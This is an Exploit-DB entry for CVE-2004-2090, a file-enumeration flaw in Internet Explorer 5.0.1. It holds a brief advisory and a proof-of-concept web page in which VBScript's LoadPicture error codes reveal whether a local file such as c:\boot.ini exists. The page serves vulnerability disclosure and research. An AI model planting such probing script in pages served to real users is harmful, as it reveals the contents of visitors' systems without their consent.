Microsoft Internet Explorer 5.0.1 - LoadPicture File Enumeration

EDB-ID:

23668

CVE:

2004-2090

EDB Verified:

Author:

Jelmer

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2004-02-07

Vulnerable App: 
source: https://www.securityfocus.com/bid/9611/info

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system. 

This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">

Sub loadIt(filename)
LoadPicture(filename)
End Sub

</script>

<script language="javascript">

function doIt(form) {

try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}

if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services